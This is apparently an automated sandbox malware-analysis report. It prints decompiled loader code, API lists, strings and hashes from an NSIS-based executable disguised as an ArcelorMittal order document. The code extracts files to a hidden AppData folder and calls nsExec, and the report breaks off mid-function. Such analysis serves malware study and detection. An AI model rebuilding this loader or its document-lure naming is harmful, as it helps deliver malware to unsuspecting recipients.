				_t91 = L"C:\\Users\\frontdesk\\Desktop\\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe";
				 *0x7a8a4c = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\frontdesk\\Desktop\\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", 0x400);
				_t89 = E00405C07(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\frontdesk\\Desktop";
				E00406032(L"C:\\Users\\frontdesk\\Desktop", _t91);
				E00406032(L"Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", E00405A32(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x7976fc = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402D8A(1);
					__eflags =  *0x7a8a54 - _t82;
					if( *0x7a8a54 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E00403235( *0x7a8a54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff);
						_t57 = E00403027();
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x7a8a50 = _t94;
							 *0x7a8a58 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x7a8a5c =  *0x7a8a5c + 1;
								__eflags =  *0x7a8a5c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405BC2(0x7a8a60, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403235( *0x78b6f4);
					_t65 = E0040321F( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x7a8a54) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E0040321F(0x797700, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402D8A(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x7a8a54;
						if( *0x7a8a54 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402D8A(0);
							}
							goto L20;
						}
						E00405BC2( &_v44, 0x797700, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x78b6f4; // 0x24cc4
						 *0x7a8ae0 =  *0x7a8ae0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x7a8a54 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x7976fc; // 0x253b8
						if(__eflags < 0) {
							_v12 = E004064B9(_v12, 0x797700, _t90);
						}
						 *0x78b6f4 =  *0x78b6f4 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}































                                                0x00402df6
                                                0x00402df9
                                                0x00402dfc
                                                0x00402dff
                                                0x00402e05
                                                0x00402e16
                                                0x00402e1b
                                                0x00402e2e
                                                0x00402e33
                                                0x00402e36
                                                0x00402e3c
                                                0x00000000
                                                0x00402e3e
                                                0x00402e49
                                                0x00402e4f
                                                0x00402e60
                                                0x00402e67
                                                0x00402e6d
                                                0x00402e6f
                                                0x00402e74
                                                0x00402e76
                                                0x00402f63
                                                0x00402f65
                                                0x00402f6a
                                                0x00402f71
                                                0x00000000
                                                0x00000000
                                                0x00402f73
                                                0x00402f76
                                                0x00402f9a
                                                0x00402f9f
                                                0x00402fa5
                                                0x00402fb0
                                                0x00402fb5
                                                0x00402fb8
                                                0x00402fb9
                                                0x00402fba
                                                0x00402fbc
                                                0x00402fc1
                                                0x00402fc4
                                                0x00402fd7
                                                0x00402fdb
                                                0x00402fe3
                                                0x00402fe8
                                                0x00402fea
                                                0x00402fea
                                                0x00402fea
                                                0x00402ff2
                                                0x00402ff2
                                                0x00402ff5
                                                0x00402ff6
                                                0x00402ff6
                                                0x00402ff9
                                                0x00402ffb
                                                0x00402ffb
                                                0x00402ffb
                                                0x00403005
                                                0x0040300b
                                                0x00403019
                                                0x0040301e
                                                0x00000000
                                                0x0040301e
                                                0x00000000
                                                0x00402fc4
                                                0x00402f7e
                                                0x00402f89
                                                0x00402f8e
                                                0x00402f90
                                                0x00000000
                                                0x00000000
                                                0x00402f95
                                                0x00402f98
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402e7c
                                                0x00402e81
                                                0x00402e86
                                                0x00402e8a
                                                0x00402e91
                                                0x00402e96
                                                0x00402e98
                                                0x00402e9a
                                                0x00402e9a
                                                0x00402e9e
                                                0x00402ea3
                                                0x00402ea5
                                                0x00402fcf
                                                0x00402fc6
                                                0x00000000
                                                0x00402fc6
                                                0x00402eab
                                                0x00402eb2
                                                0x00402f2e
                                                0x00402f32
                                                0x00402f36
                                                0x00402f3b
                                                0x00000000
                                                0x00402f32
                                                0x00402ebb
                                                0x00402ec0
                                                0x00402ec3
                                                0x00402ec8
                                                0x00000000
                                                0x00000000
                                                0x00402eca
                                                0x00402ed1
                                                0x00000000
                                                0x00000000
                                                0x00402ed3
                                                0x00402eda
                                                0x00000000
                                                0x00000000
                                                0x00402edc
                                                0x00402ee3
                                                0x00000000
                                                0x00000000
                                                0x00402ee5
                                                0x00402eec
                                                0x00000000
                                                0x00000000
                                                0x00402eee
                                                0x00402ef4
                                                0x00402efd
                                                0x00402f03
                                                0x00402f06
                                                0x00402f08
                                                0x00402f0e
                                                0x00000000
                                                0x00000000
                                                0x00402f14
                                                0x00402f18
                                                0x00402f20
                                                0x00402f20
                                                0x00402f23
                                                0x00402f26
                                                0x00402f28
                                                0x00402f2a
                                                0x00402f2a
                                                0x00000000
                                                0x00402f28
                                                0x00402f1a
                                                0x00402f1e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402f3c
                                                0x00402f3c
                                                0x00402f42
                                                0x00402f4e
                                                0x00402f4e
                                                0x00402f51
                                                0x00402f57
                                                0x00402f59
                                                0x00402f59
                                                0x00402f61
                                                0x00402f61
                                                0x00000000
                                                0x00402f61

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402DFF
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,00000400,?,?,00000000,00403517,?), ref: 00402E1B
                                                  • Part of subcall function 00405C07: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00405C0B
                                                  • Part of subcall function 00405C07: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403517,?), ref: 00405C2D
                                                • GetFileSize.KERNEL32(00000000,00000000,Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00402E67
                                                Strings
                                                • Inst, xrefs: 00402ED3
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                • "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", xrefs: 00402DF4
                                                • C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
                                                • Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, xrefs: 00402E5B
                                                • Null, xrefs: 00402EE5
                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402DF5
                                                • C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, xrefs: 00402E05, 00402E14, 00402E28, 00402E48
                                                • Error launching installer, xrefs: 00402E3E
                                                • soft, xrefs: 00402EDC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                • String ID: "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe$soft
                                                • API String ID: 4283519449-3514231688
                                                • Opcode ID: 2249d346c310f13e90e060258289ef97018bdecfafda78b47c803c2d5af002aa
                                                • Instruction ID: ab97cff943281949067decbc104515b53a1facb94f92f7dd678b53d189ae88d2
                                                • Opcode Fuzzy Hash: 2249d346c310f13e90e060258289ef97018bdecfafda78b47c803c2d5af002aa
                                                • Instruction Fuzzy Hash: 6351F671940206ABCB109F65DE49B9E7BB8FB15394F20813BF904B62C1D7BC9D809B5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 872 401767-40178c call 402bbf call 405a5d 877 401796-4017a8 call 406032 call 4059e6 lstrcatW 872->877 878 40178e-401794 call 406032 872->878 884 4017ad-4017ae call 4062c6 877->884 878->884 887 4017b3-4017b7 884->887 888 4017b9-4017c3 call 406375 887->888 889 4017ea-4017ed 887->889 897 4017d5-4017e7 888->897 898 4017c5-4017d3 CompareFileTime 888->898 891 4017f5-401811 call 405c07 889->891 892 4017ef-4017f0 call 405be2 889->892 899 401813-401816 891->899 900 401885-4018ae call 405191 call 403027 891->900 892->891 897->889 898->897 901 401867-401871 call 405191 899->901 902 401818-401856 call 406032 * 2 call 406054 call 406032 call 405777 899->902 914 4018b0-4018b4 900->914 915 4018b6-4018c2 SetFileTime 900->915 912 40187a-401880 901->912 902->887 935 40185c-40185d 902->935 916 402a55 912->916 914->915 918 4018c8-4018d3 CloseHandle 914->918 915->918 920 402a57-402a5b 916->920 921 4018d9-4018dc 918->921 922 402a4c-402a4f 918->922 924 4018f1-4018f4 call 406054 921->924 925 4018de-4018ef call 406054 lstrcatW 921->925 922->916 930 4018f9-40228d call 405777 924->930 925->930 930->920 935->912 937 40185f-401860 935->937 937->901
                                                C-Code - Quality: 61%
                                                			E00401767(FILETIME* __ebx, void* __eflags) {
				void* __edi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t81;
				void* _t82;
				WCHAR* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 0xc) = E00402BBF(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x2c) & 0x00000007;
				_t35 = E00405A5D( *(_t86 - 0xc));
				_push( *(_t86 - 0xc));
				_t84 = L"ExecToStack";
				if(_t35 == 0) {
					lstrcatW(E004059E6(E00406032(_t84, L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis\\Grusendes\\Stoser\\Unappealingness\\Dermobranchiate")), ??);
				} else {
					E00406032();
				}
				E004062C6(_t84);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406375(_t84);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x20);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405BE2(_t84);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405C07(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 8) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E00405191(0xffffffe2,  *(_t86 - 0xc));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x7a8ac8;
						goto L32;
					} else {
						E00406032("C:\Users\FRONTD~1\AppData\Local\Temp\nsq5B3B.tmp", _t81);
						E00406032(_t81, _t84);
						E00406054(_t77, _t81, _t84, "C:\Users\FRONTD~1\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll",  *((intOrPtr*)(_t86 - 0x18)));
						E00406032(_t81, "C:\Users\FRONTD~1\AppData\Local\Temp\nsq5B3B.tmp");
						_t64 = E00405777("C:\Users\FRONTD~1\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll",  *(_t86 - 0x2c) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x7a8ac8 =  &( *0x7a8ac8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t84);
								_push(0xfffffffa);
								E00405191();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E00405191(0xffffffea,  *(_t86 - 0xc));
				 *0x7a8af4 =  *0x7a8af4 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 8));
				_push( *((intOrPtr*)(_t86 - 0x24)));
				_t45 = E00403027(); // executed
				 *0x7a8af4 =  *0x7a8af4 - 1;
				__eflags =  *(_t86 - 0x20) - 0xffffffff;
				_t82 = _t45;
				if( *(_t86 - 0x20) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 8), _t86 - 0x20, _t77, _t86 - 0x20); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x1c)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x1c)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 8));
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E00406054(_t77, _t82, _t84, _t84, 0xffffffee);
					} else {
						E00406054(_t77, _t82, _t84, _t84, 0xffffffe9);
						lstrcatW(_t84,  *(_t86 - 0xc));
					}
					_push(0x200010);
					_push(_t84);
					E00405777();
					goto L29;
				}
				goto L33;
			}


















                                                0x00401767
                                                0x0040176e
                                                0x0040177a
                                                0x0040177d
                                                0x00401782
                                                0x00401785
                                                0x0040178c
                                                0x004017a8
                                                0x0040178e
                                                0x0040178f
                                                0x0040178f
                                                0x004017ae
                                                0x004017b3
                                                0x004017b3
                                                0x004017b7
                                                0x004017ba
                                                0x004017bf
                                                0x004017c1
                                                0x004017c3
                                                0x004017c8
                                                0x004017c8
                                                0x004017d3
                                                0x004017d3
                                                0x004017e4
                                                0x004017e6
                                                0x004017e6
                                                0x004017e7
                                                0x004017e7
                                                0x004017ea
                                                0x004017ed
                                                0x004017f0
                                                0x004017f0
                                                0x004017f7
                                                0x00401806
                                                0x0040180b
                                                0x0040180e
                                                0x00401811
                                                0x00000000
                                                0x00000000
                                                0x00401813
                                                0x00401816
                                                0x0040186c
                                                0x00401871
                                                0x004015ae
                                                0x0040281e
                                                0x0040281e
                                                0x00402a4c
                                                0x00402a4f
                                                0x00402a4f
                                                0x00000000
                                                0x00401818
                                                0x0040181e
                                                0x00401825
                                                0x00401832
                                                0x0040183d
                                                0x00401853
                                                0x00401853
                                                0x00401856
                                                0x00000000
                                                0x0040185c
                                                0x0040185c
                                                0x0040185d
                                                0x0040187a
                                                0x00402a55
                                                0x00402a55
                                                0x00402a55
                                                0x0040185f
                                                0x0040185f
                                                0x00401860
                                                0x00401493
                                                0x00402288
                                                0x00402288
                                                0x00402288
                                                0x0040185d
                                                0x00401856
                                                0x00402a57
                                                0x00402a5b
                                                0x00402a5b
                                                0x0040188a
                                                0x0040188f
                                                0x00401895
                                                0x00401896
                                                0x00401897
                                                0x0040189a
                                                0x0040189d
                                                0x004018a2
                                                0x004018a8
                                                0x004018ac
                                                0x004018ae
                                                0x004018b6
                                                0x004018c2
                                                0x004018b0
                                                0x004018b0
                                                0x004018b4
                                                0x00000000
                                                0x00000000
                                                0x004018b4
                                                0x004018cb
                                                0x004018d1
                                                0x004018d3
                                                0x00000000
                                                0x004018d9
                                                0x004018d9
                                                0x004018dc
                                                0x004018f4
                                                0x004018de
                                                0x004018e1
                                                0x004018ea
                                                0x004018ea
                                                0x004018f9
                                                0x004018fe
                                                0x00402283
                                                0x00000000
                                                0x00402283
                                                0x00000000

                                                APIs
                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                                • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate,?,?,00000031), ref: 004017CD
                                                  • Part of subcall function 00406032: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,0040332D,Overcaustically Setup,NSIS Error), ref: 0040603F
                                                  • Part of subcall function 00405191: lstrlenW.KERNEL32(007A0F20,00000000,007924F8,772EEA30,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C9
                                                  • Part of subcall function 00405191: lstrlenW.KERNEL32(00403168,007A0F20,00000000,007924F8,772EEA30,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D9
                                                  • Part of subcall function 00405191: lstrcatW.KERNEL32(007A0F20,00403168), ref: 004051EC
                                                  • Part of subcall function 00405191: SetWindowTextW.USER32(007A0F20,007A0F20), ref: 004051FE
                                                  • Part of subcall function 00405191: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405224
                                                  • Part of subcall function 00405191: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523E
                                                  • Part of subcall function 00405191: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp$C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate$ExecToStack
                                                • API String ID: 1941528284-3720196480
                                                • Opcode ID: f68a6b2c34e2433bc227599e278aafb616f0a180d0c639fbdfc3b46ee5da03b6
                                                • Instruction ID: 9699be85dc7bc18e029f6e3bff89e0f5bb762e6a6aa9adbfdaf5ed0cd7dffae0
                                                • Opcode Fuzzy Hash: f68a6b2c34e2433bc227599e278aafb616f0a180d0c639fbdfc3b46ee5da03b6
                                                • Instruction Fuzzy Hash: A341D571940515BBCF10BBB5CC46DAF3679EF06369B20823BF122B10E1DB3C8A519A6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 938 4025e5-4025fa call 402ba2 941 402600-402607 938->941 942 402a4c-402a4f 938->942 944 402609 941->944 945 40260c-40260f 941->945 943 402a55-402a5b 942->943 944->945 946 402773-40277b 945->946 947 402615-402624 call 405f92 945->947 946->942 947->946 951 40262a 947->951 952 402630-402634 951->952 953 4026c9-4026cc 952->953 954 40263a-402655 ReadFile 952->954 956 4026e4-4026f4 call 405c8a 953->956 957 4026ce-4026d1 953->957 954->946 955 40265b-402660 954->955 955->946 960 402666-402674 955->960 956->946 966 4026f6 956->966 957->956 958 4026d3-4026de call 405ce8 957->958 958->946 958->956 963 40267a-40268c MultiByteToWideChar 960->963 964 40272f-40273b call 405f79 960->964 963->966 967 40268e-402691 963->967 964->943 969 4026f9-4026fc 966->969 970 402693-40269e 967->970 969->964 972 4026fe-402703 969->972 970->969 973 4026a0-4026c5 SetFilePointer MultiByteToWideChar 970->973 974 402740-402744 972->974 975 402705-40270a 972->975 973->970 976 4026c7 973->976 977 402761-40276d SetFilePointer 974->977 978 402746-40274a 974->978 975->974 979 40270c-40271f 975->979 976->966 977->946 980 402752-40275f 978->980 981 40274c-402750 978->981 979->946 982 402721-402727 979->982 980->946 981->977 981->980 982->952 983 40272d 982->983 983->946
                                                C-Code - Quality: 83%
                                                			E004025E5(intOrPtr __ebx, void* __esi) {
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t73;
				void* _t76;

				 *((intOrPtr*)(_t73 - 0xc)) = __ebx;
				_t64 = 2;
				 *((intOrPtr*)(_t73 - 0x3c)) = _t64;
				_t65 = E00402BA2(_t64);
				_t76 = _t65 - 1;
				 *((intOrPtr*)(_t73 - 0x48)) = _t65;
				if(_t76 < 0) {
					L36:
					 *0x7a8ac8 =  *0x7a8ac8 +  *(_t73 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x48) = 0x3ff;
					}
					if( *__esi == __bx) {
						L34:
						__ecx =  *(__ebp - 0x10);
						__eax =  *(__ebp - 0xc);
						 *( *(__ebp - 0x10) +  *(__ebp - 0xc) * 2) = __bx;
						if(_t76 == 0) {
							 *(_t73 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 8) = __ebx;
						 *(__ebp - 0x14) = E00405F92(__ecx, __esi);
						if( *(__ebp - 0x48) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x30)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x20)) != __ebx ||  *(__ebp - 0xc) != __ebx || E00405CE8( *(__ebp - 0x14), __ebx) >= 0) {
										__eax = __ebp - 0x40;
										if(E00405C8A( *(__ebp - 0x14), __ebp - 0x40, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x38;
									_push(__ebx);
									_push(__ebp - 0x38);
									__eax = 2;
									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x20)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x14), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x20)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x38);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x3c) = __ecx;
											 *(__ebp - 0x40) = __eax;
											if( *((intOrPtr*)(__ebp - 0x20)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00405F79( *(__ebp - 0x10), __ax & 0x0000ffff);
											} else {
												__ebp - 0x40 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x40, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x40);
												} else {
													__esi =  *(__ebp - 0x3c);
													__esi =  ~( *(__ebp - 0x3c));
													while(1) {
														_t21 = __ebp - 0x38;
														 *_t21 =  *(__ebp - 0x38) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x40) = 0xfffd;
														if( *_t21 == 0) {
															goto L22;
														}
														 *(__ebp - 0x3c) =  *(__ebp - 0x3c) - 1;
														__esi = __esi + 1;
														__eax = SetFilePointer( *(__ebp - 0x14), __esi, __ebx, 1); // executed
														__ebp - 0x40 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x40, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x20)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 8) == 0xd ||  *(__ebp - 8) == 0xa) {
														if( *(__ebp - 8) == __ax || __ax != 0xd && __ax != 0xa) {
